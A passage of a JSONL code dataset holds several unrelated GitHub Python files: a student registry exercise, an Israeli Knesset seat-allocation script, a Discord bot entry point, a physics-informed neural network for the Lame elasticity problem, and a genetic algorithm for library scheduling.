=\"center\")\r\n\r\nroot.mainloop()\r\n\r\n","repo_name":"JavierGarciaCortes/creaSubtitulos","sub_path":"GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"93"} +{"seq_id":"35928355412","text":"from .middleware import get_erp_con\n\n\nclass ERPPartner:\n\n ATTRIBUTES = [\n 'id'\n ]\n\n def __init__(self, vat):\n self.erp_con = get_erp_con()\n self.Partner = self.erp_con.model('res.partner')\n partner_id = self.Partner.search([('vat', '=', \"ES\" + vat)])\n if partner_id:\n for attr, value in self.Partner.read(partner_id[0], self.ATTRIBUTES).items():\n setattr(self, attr, value)\n\n @property\n def address_codes(self):\n if hasattr(self, 'id'):\n city_id = self.Partner.read(\n self.id, ['www_municipi']\n )['www_municipi'][0]\n city = self.erp_con.ResMunicipi.read(city_id, ['ine', 'state'])\n city_code = city['ine']\n state_id = city['state'][0]\n state = self.erp_con.ResCountryState.read(\n state_id, ['code', 'comunitat_autonoma']\n )\n state_code = state['code']\n ccaa_id = state['comunitat_autonoma'][0]\n ccaa = self.erp_con.ResComunitat_autonoma.read(ccaa_id, ['codi'])\n ccaa_code = ccaa['codi']\n return (ccaa_code, state_code, city_code)\n return ()\n","repo_name":"Som-Energia/som-cas","sub_path":"som_cas/contrib.py","file_name":"contrib.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"93"} +{"seq_id":"18752694652","text":"# Elfar Snær Arnarson\r\n# 27 Janúar 2020\r\n# Skilaverkefni 3\r\n\r\nimport pickle\r\n\r\n\r\nclass Nemi:\r\n def __init__(self, kt, nafn, kyn, heimilisfang, simanumer, netfang):\r\n self.kt = kt\r\n self.nafn = nafn\r\n self.kyn = kyn\r\n self.heimilisfang = heimilisfang\r\n self.simanumer = simanumer\r\n self.netfang = netfang\r\n\r\n\r\nclass Grunnskolanemi(Nemi):\r\n def __init__(self, kt, nafn, kyn, heimilisfang, simanumer, netfang, forradarmadur, nafnSkola):\r\n super().__init__(kt, nafn, kyn, heimilisfang, simanumer, netfang)\r\n self.forradarmadur = forradarmadur\r\n self.nafnSkola = nafnSkola\r\n\r\n\r\nclass Framhaldsskolanemi(Nemi):\r\n def __init__(self, kt, nafn, kyn, heimilisfang, simanumer, netfang, brautarheiti, busetustyrk):\r\n super().__init__(kt, nafn, kyn, heimilisfang, simanumer, netfang)\r\n self.brautarheiti = brautarheiti\r\n self.busetustyrk = busetustyrk\r\n\r\n\r\n\r\nclass Haskolanemi(Nemi):\r\n def __init__(self, kt, nafn, kyn, heimilisfang, simanumer, netfang, stigNams, namslan):\r\n super().__init__(kt, nafn, kyn, heimilisfang, simanumer, netfang)\r\n self.stigNams = stigNams\r\n self.namslan = namslan\r\n\r\n\r\nnemendalisti = []\r\n# skraningnemenda = nemar.SkraningNemenda()\r\n#óklárað\r\nchoice = \"0\"\r\nwhile choice != \"7\":\r\n print(\"1. Opna nemaskrá\")\r\n print(\"2. Skrá grunnskólanema.\")\r\n print(\"3. Skrá framhaldsskólkanema.\")\r\n print(\"4. Skrá Háskólanema.\")\r\n print(\"5. Vista nemaskrá\")\r\n print(\"6. Prenta nemendalista\")\r\n print(\"7. Hætta\")\r\n\r\n choice = str(input(\"Sláðu inn val: \"))\r\n if choice == \"1\":\r\n with open('nema_listi', 'rb') as file:\r\n nemendalisti = pickle.load(file)\r\n elif choice == \"2\":\r\n grunnskolanemi = Grunnskolanemi('2905992379', 'Jón Arnar Árnason', 'kk', 'Svarthamar 26', '58712345',\r\n 'jonarnar@gmail.com', 'Árni Árnason', 'Borgarskóli')\r\n nemendalisti.append(grunnskolanemi)\r\n elif choice == \"3\":\r\n framhaldsskolanemi = Framhaldsskolanemi('2815005485', 'Arnar Sigurðsson', 'kk', 'Logafold 13'\r\n , '5874584', 'arnarsig@gmail.com', 'Tölvubraut', 'Nei')\r\n nemendalisti.append(framhaldsskolanemi)\r\n elif choice == \"4\":\r\n haskolanemi = Haskolanemi('2504884828', 'Snæbjörn Fjarðarsson', 'kk', \"Dúfnahóll 14\"\r\n , '8485784', \"snaebjorn12@gmail.com\", 'PHd', 'Já')\r\n nemendalisti.append(haskolanemi)\r\n elif choice == \"5\":\r\n with open(\"nema_listi\", 'wb') as file:\r\n pickle.dump(nemendalisti, file)\r\n elif choice == \"6\":\r\n #óklárað\r\n print(nemendalisti)\r\n","repo_name":"PanamaP/pythonDump","sub_path":"Skilaverkefni 3/Nemar.py","file_name":"Nemar.py","file_ext":"py","file_size_in_byte":2747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"17340336970","text":"from dao_malopolska_area import DAOMalopolskaArea\n\n\nclass ModelRoot():\n\n def __init__(self):\n self.malopolska_area_container = DAOMalopolskaArea().extract_imported_data()\n\n def get_malopolska_area_container(self):\n return self.malopolska_area_container\n\n def get_menu_options(self):\n self.menu_options = [\"(1) List statistics\",\n \"(2) Display 3 cities with longest names\",\n \"(3) Display county's name with the largest number of communities\",\n \"(4) Display locations, that belong to more than one category\",\n \"(5) Advanced search\",\n \"(6) Show all areas\",\n \"(0) Exit program\"]\n return self.menu_options\n","repo_name":"LMalko/Know-Your-neighbouhood","sub_path":"model_root.py","file_name":"model_root.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"44351003498","text":"#!/usr/bin/env python3\n\nimport sys\nimport csv\nimport urllib.request\nimport json\n\nCITY = 'שם ישוב'\nELLIGIBLE = 'בזב'\nTOTAL_VOTES = 'מצביעים'\nINVALID_VOTES = 'פסולים'\nVALID_VOTES = 'כשרים'\n\nADDITIONAL_BALLOTS = 'מעטפות חיצוניות'\n\nEXPC_FIELDNAMES = [\n 'סמל ועדה',\n CITY,\n 'סמל ישוב',\n ELLIGIBLE,\n TOTAL_VOTES,\n INVALID_VOTES,\n VALID_VOTES,\n]\n\n\ndef parse_parties(fieldnames):\n i = len(EXPC_FIELDNAMES)\n assert fieldnames[:i] == EXPC_FIELDNAMES\n # rows may contain a trailing comma\n parties = fieldnames[i:]\n if parties[-1] == '':\n parties = parties[:-1]\n return parties\n\n\n# expc.csv\ndef parse_expc(filename, encoding):\n votes_per_city = {}\n turnout_per_city = {}\n with open(filename, newline='', encoding=encoding) as csvfile:\n reader = csv.DictReader(csvfile)\n parties = parse_parties(reader.fieldnames)\n for row in reader:\n city = row[CITY]\n assert city not in votes_per_city\n elligible = int(row[ELLIGIBLE])\n total_votes = int(row[TOTAL_VOTES])\n valid_votes = int(row[VALID_VOTES])\n invalid_votes = int(row[INVALID_VOTES])\n assert elligible >= 0\n assert total_votes >= 0\n assert valid_votes >= 0\n assert invalid_votes >= 0\n assert total_votes == valid_votes + invalid_votes, \\\n f\"numbers don't add up correctly in {city}\"\n votes_per_party = {}\n for party in parties:\n votes = int(row[party])\n assert votes >= 0\n votes_per_party[party] = votes\n assert sum(votes_per_party.values()) == valid_votes, \\\n f\"numbers don't add up correctly in {city}\"\n votes_per_city[city] = votes_per_party\n if elligible != 0:\n if total_votes > elligible:\n print(f\"voter turnout > 100% in {city}\")\n print(\"\\t\" f\"elligible voters: {elligible}\")\n print(\"\\t\" f\"total votes: {total_votes}\")\n turnout = total_votes / elligible\n turnout_per_city[city] = turnout\n else:\n # for some reason, this field is zero\n assert city == ADDITIONAL_BALLOTS\n return parties, votes_per_city, turnout_per_city\n\n\ndef parse_alliances(filename, encoding):\n with open(filename, 'r', encoding=encoding) as f:\n lines = f.readlines()\n alliances = []\n for line in lines:\n line = line.strip()\n if line != '':\n words = line.split()\n assert len(words) == 2\n assert words[0] != words[1]\n assert all(words[0] not in a for a in alliances)\n assert all(words[1] not in a for a in alliances)\n alliances.append(tuple(words))\n return alliances\n\n\ndef get_party_votes(votes_per_city, party):\n return sum(votes_per_party[party] for votes_per_party in votes_per_city.values())\n\n\nELECTORAL_THRESHOLD_PERCENTAGE = 3.25\nNUMBER_OF_SEATS = 120\n# see https://main.knesset.gov.il/About/Lexicon/Pages/seats.aspx\ndef calculate_seats(votes_per_party, alliances):\n parties = list(votes_per_party.keys())\n total_votes = sum(votes_per_party.values()) # A\n electoral_threshold = total_votes * (ELECTORAL_THRESHOLD_PERCENTAGE / 100.) # B\n is_failed_party = lambda party: votes_per_party[party] < electoral_threshold\n failed_parties = [party for party in parties if is_failed_party(party)]\n # discard failed parties that didn't pass the electoral threshold\n votes_per_party = {party : votes for party, votes in votes_per_party.items() if party not in failed_parties} # F\n total_votes = sum(votes_per_party.values()) # D\n votes_per_seat = total_votes // NUMBER_OF_SEATS # E\n seats_per_party = {party : votes // votes_per_seat for party, votes in votes_per_party.items()} # G\n remaining_seats = NUMBER_OF_SEATS - sum(seats_per_party.values()) # H\n # discard electoral alliances with parties that didn't pass the threshold\n is_failed_alliance = lambda alliance: any(party in failed_parties for party in alliance)\n alliances = [alliance for alliance in alliances if not is_failed_alliance(alliance)]\n is_in_alliance = lambda party: any(party in alliance for alliance in alliances)\n seats_distribution = {party : seats for party, seats in seats_per_party.items() if not is_in_alliance(party)}\n seats_distribution.update({alliance : sum(seats_per_party[party] for party in alliance) for alliance in alliances})\n votes_distribution = {party : votes for party, votes in votes_per_party.items() if not is_in_alliance(party)}\n votes_distribution.update({alliance : sum(votes_per_party[party] for party in alliance) for alliance in alliances})\n parties_and_alliances = list(seats_distribution.keys())\n # split the remaining seats among the parties (and electoral alliances)\n while remaining_seats > 0:\n # parties that got half of the number of seats but less than half of the total votes, cannot get more seats\n is_invalid_party = lambda party: seats_distribution[party] >= NUMBER_OF_SEATS // 2 and votes_distribution[party] < total_votes // 2\n measure_per_party = {party : votes_distribution[party] / (seats_distribution[party] + 1) for party in parties_and_alliances if not is_invalid_party(party)} # I\n chosen_party = max(measure_per_party, key=measure_per_party.get)\n seats_distribution[chosen_party] += 1\n remaining_seats -= 1\n # calculate seats distribution for parties which aren't in any electoral alliance\n seats_per_party = {party : seats for party, seats in seats_distribution.items() if not party in alliances}\n # split the seats among the parties in each electoral alliance\n for alliance in alliances:\n shared_seats = seats_distribution[alliance] # J\n shared_measure = votes_distribution[alliance] // shared_seats # K\n individual_seats = {party : votes_per_party[party] // shared_measure for party in alliance} # L\n remaining_seats = shared_seats - sum(individual_seats.values())\n # split the remaining seats among the individual parties in the electoral alliance\n while remaining_seats > 0:\n # parties that got half of the number of seats but less than half of the total votes, cannot get more seats\n is_invalid_party = lambda party: individual_seats[party] >= NUMBER_OF_SEATS // 2 and votes_per_party[party] < total_votes // 2\n individual_measure = {party : votes_per_party[party] / (individual_seats[party] + 1) for party in alliance if not is_invalid_party(party)} # M\n chosen_party = max(individual_measure, key=individual_measure.get)\n individual_seats[chosen_party] += 1\n remaining_seats -= 1\n # update seats distribution for parties in the electoral alliance\n seats_per_party.update(individual_seats)\n # finally, parties that didn't pass the electoral threshold get zero seats\n for party in failed_parties:\n seats_per_party[party] = 0\n return seats_per_party\n\n\nEXPC_CSV_URL = \"https://media{N}.bechirot.gov.il/files/expc.csv\"\nENCODING = \"utf-8-sig\" # utf-8 with BOM\n\ndef main(argv):\n assert len(argv) == 4, \\\n f\"Usage: {argv[0]} \"\n\n expc_csv_filename, _ = urllib.request.urlretrieve(EXPC_CSV_URL.format(N=argv[1]))\n alliances_filename = argv[2]\n parties, votes_per_city, turnout_per_city = parse_expc(expc_csv_filename, ENCODING)\n electoral_alliances = parse_alliances(alliances_filename, 'utf-8')\n votes_per_party = {party : get_party_votes(votes_per_city, party) for party in parties}\n seats_per_party = calculate_seats(votes_per_party, electoral_alliances)\n results_filename = argv[3]\n with open(results_filename, 'w', encoding='utf-8') as f:\n json.dump(seats_per_party, f, ensure_ascii=False)\n\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","repo_name":"royeldar/elections","sub_path":"elections.py","file_name":"elections.py","file_ext":"py","file_size_in_byte":8032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"148780934","text":"import os, logging, logging.config\nfrom discord.ext.commands import Bot\nfrom utils import files\nfrom config import options, PRIVATE, testers_id\nfrom dotenv import load_dotenv\nfrom commands.ext.games import GameManager\n\nbot = Bot(**options())\n\n\ndef load_extensions(system):\n for file in files.get_py_files(system):\n bot.load_extension('{}.{}'.format(system.replace('/', '.'), file))\n\n\nif __name__ == \"__main__\":\n load_dotenv()\n\n logging.config.fileConfig('logs/config.cfg')\n\n bot.add_cog(GameManager(bot))\n load_extensions('commands')\n bot.load_extension('commands.exchange.command')\n bot.load_extension('commands.tictactoe.command')\n bot.load_extension('commands.hangman.command')\n bot.load_extension('commands.minesweeper.command')\n \n load_extensions('events')\n bot.load_extension('events.chat.event')\n\n\n@bot.event\nasync def on_message(message):\n if message.author == bot.user or message.author.bot:\n return\n if PRIVATE:\n if not message.author.id in testers_id:\n return\n await bot.process_commands(message)\n\n\nbot.run(os.getenv('DISCORD_TOKEN'))","repo_name":"gambarov/discord-patron-bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"73387604787","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nSolves the quarter Lame problem.\n\n * * * * * *\n * *\n * *\n * * \n * * \n * * \n * * \n y * *\n |__x * * * * * * **\n -------| --> R_i\n ---------------------| -->R_o \n \nDirichlet BCs:\n\nu_x(x=0,y) = 0\nu_y(x,y=0) = 0\n\nwhere u_x represents the displacement in x direction, while u_y represents the displacement in y direction. \n\nNeumann boundary conditions (in polar coordinates)\nP(r=R_i,\\theta) = 1 \n\nIn this problem set the material properties as follows:\n - lame : 1153.846\n - shear: 769.23\n\nwhich will lead Young's modulus: 2000 and Poisson's coeff: 0.3. In this example, the Dirichlet boundary conditions are enforced hardly by choosing a surrogate model as follows:\n\nu_s = u_x*x\nv_s = u_y*y\n\nwhere u_x and u_y are the network predictions. \n\n\nThe problem definition and analytical solution:\nhttps://par.nsf.gov/servlets/purl/10100420\n\n@author: tsahin\n\"\"\"\nimport deepxde as dde\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport matplotlib.tri as tri\nfrom deepxde.backend import tf\nfrom pyevtk.hl import unstructuredGridToVTK\n\nfrom utils.elasticity.elasticity_utils import stress_plane_stress, momentum_2d_plane_stress, problem_parameters, zero_neumman_plane_stress_x, zero_neumman_plane_stress_y, stress_to_traction_2d\nfrom utils.geometry.geometry_utils import calculate_boundary_normals, polar_transformation_2d\nfrom utils.elasticity import elasticity_utils\n\n# change global variables in elasticity_utils\nelasticity_utils.lame = 1153.846\nelasticity_utils.shear = 769.23\n\n# geometrical parameters\nradius_inner = 1\ncenter_inner = [0,0]\nradius_outer = 2\ncenter_outer = [0,0]\n\n# First create two cylinders and subtract the small one from the large one. Then create a rectangle and intersect it with the region which is left.\ngeom_disk_1 = dde.geometry.Disk(center_inner, radius_inner)\ngeom_disk_2 = dde.geometry.Disk(center_outer, radius_outer)\ngeom_disk = dde.geometry.csg.CSGDifference(geom1=geom_disk_2, geom2=geom_disk_1)\ngeom_rect = dde.geometry.Rectangle(xmin=[0, 0], xmax=[2, 2])\n\ngeom = dde.geometry.csg.CSGIntersection(geom1=geom_disk, geom2=geom_rect)\nelasticity_utils.geom = geom\n\n# Inner pressure\npressure_inlet = 1\n\ndef pressure_inner_x(x, y, X):\n \n sigma_xx, sigma_yy, sigma_xy = stress_plane_stress(x,y)\n \n normals, cond = calculate_boundary_normals(X,geom)\n Tx, _, _, _ = stress_to_traction_2d(sigma_xx, sigma_yy, sigma_xy, normals, cond)\n\n return Tx + pressure_inlet*normals[:,0:1]\n\ndef pressure_inner_y(x, y, X):\n\n sigma_xx, sigma_yy, sigma_xy = stress_plane_stress(x,y)\n \n normals, cond = calculate_boundary_normals(X,geom)\n _, Ty, _, _ = stress_to_traction_2d(sigma_xx, sigma_yy, sigma_xy, normals, cond)\n\n return Ty + pressure_inlet*normals[:,1:2]\n\n\ndef boundary_outer(x, on_boundary):\n return on_boundary and np.isclose(np.linalg.norm(x - center_outer, axis=-1), radius_outer)\n\ndef boundary_inner(x, on_boundary):\n return on_boundary and np.isclose(np.linalg.norm(x - center_inner, axis=-1), radius_inner)\n\ndef boundary_left(x, on_boundary):\n return on_boundary and np.isclose(x[0],0)\n\ndef boundary_bottom(x, on_boundary):\n return on_boundary and np.isclose(x[1],0)\n\nsoft_dirichlet = True # enforce the Dirichlet BC softly\n\nbc1 = dde.OperatorBC(geom, pressure_inner_x, boundary_inner)\nbc2 = dde.OperatorBC(geom, pressure_inner_y, boundary_inner)\nif soft_dirichlet:\n bc3 = dde.DirichletBC(geom, lambda _: 0.0, boundary_left, component=0)\n bc4 = dde.DirichletBC(geom, lambda _: 0.0, boundary_bottom, component=1)\nbc5 = dde.OperatorBC(geom, zero_neumman_plane_stress_x, boundary_outer)\nbc6 = dde.OperatorBC(geom, zero_neumman_plane_stress_y, boundary_outer)\nbc7 = dde.OperatorBC(geom, zero_neumman_plane_stress_x, boundary_bottom)\nbc8 = dde.OperatorBC(geom, zero_neumman_plane_stress_y, boundary_left)\n\ndata = dde.data.PDE(\n geom,\n momentum_2d_plane_stress,\n [bc1, bc2, bc3, bc4, bc5, bc6, bc7, bc8], # remove bc3 and bc4, if you want to enforce Dirichlet BC hardly\n num_domain=1500,\n num_boundary=500,\n num_test=500,\n train_distribution = \"Sobol\"\n)\n\ndef output_transform_hard(x, y):\n \"\"\"\n Enforces the Dirichlet BCs in a hard way.\n\n u_x = u_x * x\n u_y = u_y * y\n \"\"\"\n u = y[:, 0:1]\n v = y[:, 1:2]\n return tf.concat([ u*x, v*y], axis=1)\n\ndef output_transform_hard_scaled(x, y):\n \"\"\"\n Enforces the Dirichlet BCs in a hard way and scale them.\n\n u_x = u_x * x * 0.001\n u_y = u_y * y * 0.001\n \"\"\"\n\n u = y[:, 0:1]\n v = y[:, 1:2]\n return tf.concat([ u*x*0.001, v*y*0.001], axis=1)\n\ndef output_transform_scaled(x, y):\n \"\"\"\n Scale the network output:\n\n u_x = u_x * 0.001\n \"\"\"\n u = y[:, 0:1]\n v = y[:, 1:2]\n return tf.concat([ u*0.001, v*0.001], axis=1)\n\n# two inputs x and y, two outputs ux and uy\nlayer_size = [2] + [50] * 5 + [2]\nactivation = \"tanh\"\ninitializer = \"Glorot uniform\"\nnet = dde.maps.FNN(layer_size, activation, initializer)\n\noutput_scaling = True\n\nif soft_dirichlet:\n if output_scaling:\n net.apply_output_transform(output_transform_scaled)\nelse:\n if output_scaling:\n net.apply_output_transform(output_transform_hard_scaled)\n else:\n net.apply_output_transform(output_transform_hard)\n\nloss_scaling = True\n\nif loss_scaling:\n loss_weights = [1,1,1,1,1e6,1e6,1,1,1,1]\nelse:\n if not soft_dirichlet:\n loss_weights = [1,1,1,1,1,1,1,1]\n else:\n loss_weights = [1,1,1,1,1,1,1,1,1,1]\n\nmodel = dde.Model(data, net)\n# train adam\nmodel.compile(\"adam\", lr=0.001, loss_weights=loss_weights)\nlosshistory, train_state = model.train(epochs=4000, display_every=200)\n#train l-bfgs\nmodel.compile(\"L-BFGS\", loss_weights=loss_weights)\nmodel.train()\n\nvtu_and_plot_name = \"Lame_quarter_e_2000_soft_scaled_weighted\"\n\n###################################################################################\n############################## VISUALIZATION PARTS ################################\n###################################################################################\n\ndef compareModelPredictionAndAnalyticalSolution(model):\n '''\n This function plots analytical solutions vs the predictions. \n '''\n\n nu,_,_,e_modul = problem_parameters()\n \n r = np.linspace(radius_inner, radius_outer,100)\n y = np.zeros(r.shape[0])\n\n dr2 = (radius_outer**2 - radius_inner**2)\n\n sigma_rr_analytical = radius_inner**2*pressure_inlet/dr2*(r**2-radius_outer**2)/r**2\n sigma_theta_analytical = radius_inner**2*pressure_inlet/dr2*(r**2+radius_outer**2)/r**2\n u_rad_analytical = radius_inner**2*pressure_inlet*r/(e_modul*(radius_outer**2-radius_inner**2))*(1-nu+(radius_outer/r)**2*(1+nu))\n\n r_x = np.hstack((r.reshape(-1,1),y.reshape(-1,1)))\n disps = model.predict(r_x)\n u_pred, v_pred = disps[:,0:1], disps[:,1:2]\n u_rad_pred = np.sqrt(u_pred**2+v_pred**2)\n sigma_xx, sigma_yy, sigma_xy = model.predict(r_x, operator=stress_plane_stress)\n sigma_rr, sigma_theta, sigma_rtheta = polar_transformation_2d(sigma_xx, sigma_yy, sigma_xy, r_x)\n\n err_norm_disp = np.sqrt(np.sum((u_rad_pred.flatten()-u_rad_analytical.flatten())**2))\n ex_norm_disp = np.sqrt(np.sum(u_rad_analytical.flatten()**2))\n rel_err_l2_disp = err_norm_disp/ex_norm_disp\n print(\"Relative L2 error for displacement: \", rel_err_l2_disp)\n\n err_norm_stress = np.sqrt(np.sum((sigma_rr_analytical-sigma_rr.flatten())**2+(sigma_theta_analytical-sigma_theta.flatten())**2))\n ex_norm_stress = np.sqrt(np.sum(sigma_rr_analytical**2+sigma_theta_analytical**2))\n rel_err_l2_stress = err_norm_stress/ex_norm_stress\n print(\"Relative L2 error for stress: \", rel_err_l2_stress)\n\n fig, axs = plt.subplots(1,2,figsize=(12,5))\n\n axs[0].plot(r/radius_inner, sigma_rr_analytical/radius_inner, label = r\"Analytical $\\sigma_{r}$\")\n axs[0].plot(r/radius_inner, sigma_rr/radius_inner, label = r\"Predicted $\\sigma_{r}$\")\n axs[0].plot(r/radius_inner, sigma_theta_analytical/radius_inner, label = r\"Analytical $\\sigma_{\\theta}$\")\n axs[0].plot(r/radius_inner, sigma_theta/radius_inner, label = r\"Predicted $\\sigma_{\\theta}$\")\n axs[0].set(ylabel=\"Normalized radial stress\", xlabel = r\"r/$R_i$\")\n axs[1].plot(r/radius_inner, u_rad_analytical/radius_inner, label = r\"Analytical $u_r$\")\n axs[1].plot(r/radius_inner, u_rad_pred/radius_inner, label = r\"Predicted $u_r$\")\n axs[1].set(ylabel=\"Normalized radial displacement\", xlabel = r\"r/$R_i$\")\n axs[0].legend()\n axs[0].grid()\n axs[1].legend()\n axs[1].grid()\n fig.tight_layout()\n\n plt.savefig(vtu_and_plot_name)\n plt.show()\n\nX = geom.random_points(600, random=\"Sobol\")\nboun = geom.random_boundary_points(100, random=\"Sobol\")\nX = np.vstack((X,boun))\nX_corners = np.array([[radius_inner, 0],[radius_outer, 0],[0, radius_inner],[0, radius_outer]])\nX = np.vstack((X,X_corners))\n\ndisplacement = model.predict(X)\nsigma_xx, sigma_yy, sigma_xy = model.predict(X, operator=stress_plane_stress)\nsigma_rr, sigma_theta, sigma_rtheta = polar_transformation_2d(sigma_xx, sigma_yy, sigma_xy, X)\n\ncombined_disp = tuple(np.vstack((np.array(displacement[:,0].tolist()),np.array(displacement[:,1].tolist()),np.zeros(displacement[:,0].shape[0]))))\ncombined_stress = tuple(np.vstack((np.array(sigma_xx.flatten().tolist()),np.array(sigma_yy.flatten().tolist()),np.array(sigma_xy.flatten().tolist()))))\ncombined_stress_polar = tuple(np.vstack((np.array(sigma_rr.tolist()),np.array(sigma_theta.tolist()),np.array(sigma_rtheta.tolist()))))\n\nx = X[:,0].flatten()\ny = X[:,1].flatten()\nz = np.zeros(y.shape)\ntriang = tri.Triangulation(x, y)\n\n#masking off the unwanted triangles\ncondition = np.isclose(np.sqrt((x[triang.triangles]**2+y[triang.triangles]**2)),np.array([1, 1, 1]))\ncondition = ~np.all(condition, axis=1)\n\ndol_triangles = triang.triangles[condition]\noffset = np.arange(3,dol_triangles.shape[0]*dol_triangles.shape[1]+1,dol_triangles.shape[1])\ncell_types = np.ones(dol_triangles.shape[0])*5\n\nfile_path = os.path.join(os.getcwd(), vtu_and_plot_name)\n\nunstructuredGridToVTK(file_path, x, y, z, dol_triangles.flatten(), offset, \n cell_types, pointData = { \"displacement\" : combined_disp,\"stress\" : combined_stress, \"stress_polar\": combined_stress_polar})\n\ncompareModelPredictionAndAnalyticalSolution(model)","repo_name":"imcs-compsim/pinns_for_comp_mech","sub_path":"elasticity_2d/linear_elasticity/lame/Lame_problem_quarter.py","file_name":"Lame_problem_quarter.py","file_ext":"py","file_size_in_byte":10378,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"93"} +{"seq_id":"17556919558","text":"import numpy as np\nimport math as m\nimport numpy.random as random\nimport Parser\nfrom tqdm import tqdm\n\n\ndef init_pop(n, params):\n libs = params[\"libs\"]\n population = np.zeros((n, libs.size)).astype(int)\n for i in range(0, n):\n population[i, :] = np.random.permutation(libs.size)\n return population\n\n\ndef fitness(population, params):\n # return np.zeros(population.shape[0])\n score = params[\"score\"]\n deadline = params[\"days\"]\n delay = params[\"signup\"]\n books = params[\"books\"]\n per_day = params[\"ships\"]\n fit = np.zeros(population.shape[0])\n lib_score = np.zeros(population.shape[1])\n for i in range(0, population.shape[0]):\n day = 0\n for lib in population[i]:\n day += delay[lib]\n ships = min((deadline - day)*per_day[lib], len(books[lib]))\n if ships <= 0:\n break\n lib_score[lib] = params[\"cumscore\"][lib][ships-1]\n fit[i] = lib_score.sum()\n lib_score.fill(0)\n return fit\n\n\n\ndef linrank(fit, s=1.5):\n if s > 2:\n s = 2\n elif s < 1:\n s = 1\n n = fit.size\n indices = np.argsort(fit)\n rank = np.zeros_like(fit)\n for i in range(0, n):\n idx = indices[i]\n rank[idx] = (2-s)/n + 2*i*(s-1)/(n*(n-1))\n return rank\n\n\ndef exprank(fit):\n n = fit.size\n indices = np.argsort(fit)\n rank = np.zeros_like(fit)\n for i in range(0, n):\n idx = indices[i]\n rank[idx] = (1-m.exp(-i))\n rank = rank/rank.sum()\n return rank\n\n\ndef sus(ranking, n_sel):\n n_pop = ranking.size\n if n_sel > n_pop:\n return\n sel_idx = np.zeros(n_sel).astype(int)\n idx_list = np.linspace(0, n_pop-1, n_pop).astype(int)\n cdf = np.cumsum(ranking)\n for i in range(0, n_sel):\n r = (i + random.rand())/n_sel\n sel_idx[i] = idx_list[cdf >= r][0]\n np.random.shuffle(sel_idx)\n return sel_idx\n\n\ndef tournament(ranking, n_sel, size=3):\n sel_idx = np.zeros(n_sel).astype(int)\n n_ind = ranking.size\n for i in range(0, n_sel):\n drafted = random.permutation(range(0, n_ind))[0:size]\n cdf = np.cumsum(ranking[drafted])/ranking[drafted].sum()\n r = random.rand()\n sel_idx[i] = drafted[cdf >= r][0]\n return sel_idx\n\n\ndef crossover(parents, prob):\n children = np.array(parents)\n for i in range(0, parents.shape[0]-1, 2):\n if random.rand() > prob:\n break\n child1 = children[i]\n child2 = children[i+1]\n parent1 = parents[i]\n parent2 = parents[i+1]\n sz = parents.shape[1]\n r1 = random.randint(0, sz)\n r2 = random.randint(0, sz)\n p1 = min(r1, r2)\n p2 = max(r1, r2)\n ic = (p2+1) % sz\n ip = (p2+1) % sz\n while ic != p1:\n if child1[p1:p2+1].__contains__(parent2[ip]):\n ip = (ip+1) % sz\n else:\n child1[ic] = parent2[ip]\n ic = (ic+1) % sz\n ip = (ip+1) % sz\n ic = (p2+1) % sz\n ip = (p2+1) % sz\n while ic != p1:\n if child2[p1:p2+1].__contains__(parent1[ip]):\n ip = (ip+1) % sz\n else:\n child2[ic] = parent1[ip]\n ic = (ic+1) % sz\n ip = (ip+1) % sz\n return children\n\n\ndef mutate(parents, prob):\n mutated = np.array(parents)\n for i in range(0, parents.shape[0]):\n if random.rand() > prob:\n break\n r1 = random.randint(0, parents.shape[1])\n r2 = random.randint(0, parents.shape[1])\n p1 = min(r1, r2)\n p2 = max(r1, r2)\n np.random.shuffle(mutated[i][p1:p2+1])\n return mutated\n\n\ndef best_n(p_fit, c_fit, n):\n total = np.append(p_fit, c_fit)\n indices = np.argsort(total)\n return indices[-1:-n-1:-1]\n\n\ndef round_robin(p_fit, c_fit, n, q):\n if q < 2:\n q = 2\n elif q > (len(p_fit) + len(c_fit)):\n q = (len(p_fit) + len(c_fit))\n total = np.append(p_fit, c_fit)\n drafts = np.zeros_like(total).astype(int)\n wins = np.zeros_like(total).astype(int)\n for i in range(0, total.size):\n matches = q-drafts[i]\n for j in range(0, matches):\n opponent = random.randint(0, total.size)\n while opponent == i:\n opponent = random.randint(0, total.size)\n match = [i, opponent]\n drafts[match] += 1\n win_idx = np.argmax(total[match])\n winner = match[int(win_idx)]\n wins[winner] += 1\n most_wins = np.argsort(wins)\n return most_wins[-1:-n-1:-1]\n\n\ndef local_opt(pop, data, size):\n opt = np.array(pop)\n n = 5\n jmax = min(len(pop)-1, n*size)\n for i in range(0, len(pop)):\n for j in range(0, jmax, size):\n selected = pop[i][j:j+size]\n sort_idx = np.argsort(data[\"signup\"][selected])\n opt[i][j:j+size] = opt[i][sort_idx]\n fit = fitness(np.array([pop[i], opt[i]]), data)\n if fit[1] > fit[0]:\n pop[i] = opt[i]\n\n\ndef run(n_ind, gens, params, p_cross=0., p_mut=0., elitism=0.1, pop=None):\n n_child = m.floor(n_ind*(1-elitism))\n if pop is None:\n pop = init_pop(n_ind, params)\n p_fit = np.zeros(n_ind)\n c_fit = np.zeros(n_child)\n for g in tqdm(range(0, gens)):\n p_fit = fitness(pop, params)\n if g % 50 == 0:\n print(p_fit[np.argsort(p_fit)[-1]])\n rank = linrank(p_fit, 1.2)\n # rank = exprank(p_fit)\n # parent_idx = sus(rank, n_child)\n parent_idx = tournament(rank, n_child)\n parents = pop[parent_idx, :]\n children = crossover(parents, p_cross)\n children = mutate(children, p_mut)\n c_fit = fitness(children, params)\n new_idx = best_n(p_fit, c_fit, n_ind)\n # new_idx = round_robin(p_fit, c_fit, n_ind, 10)\n pop = 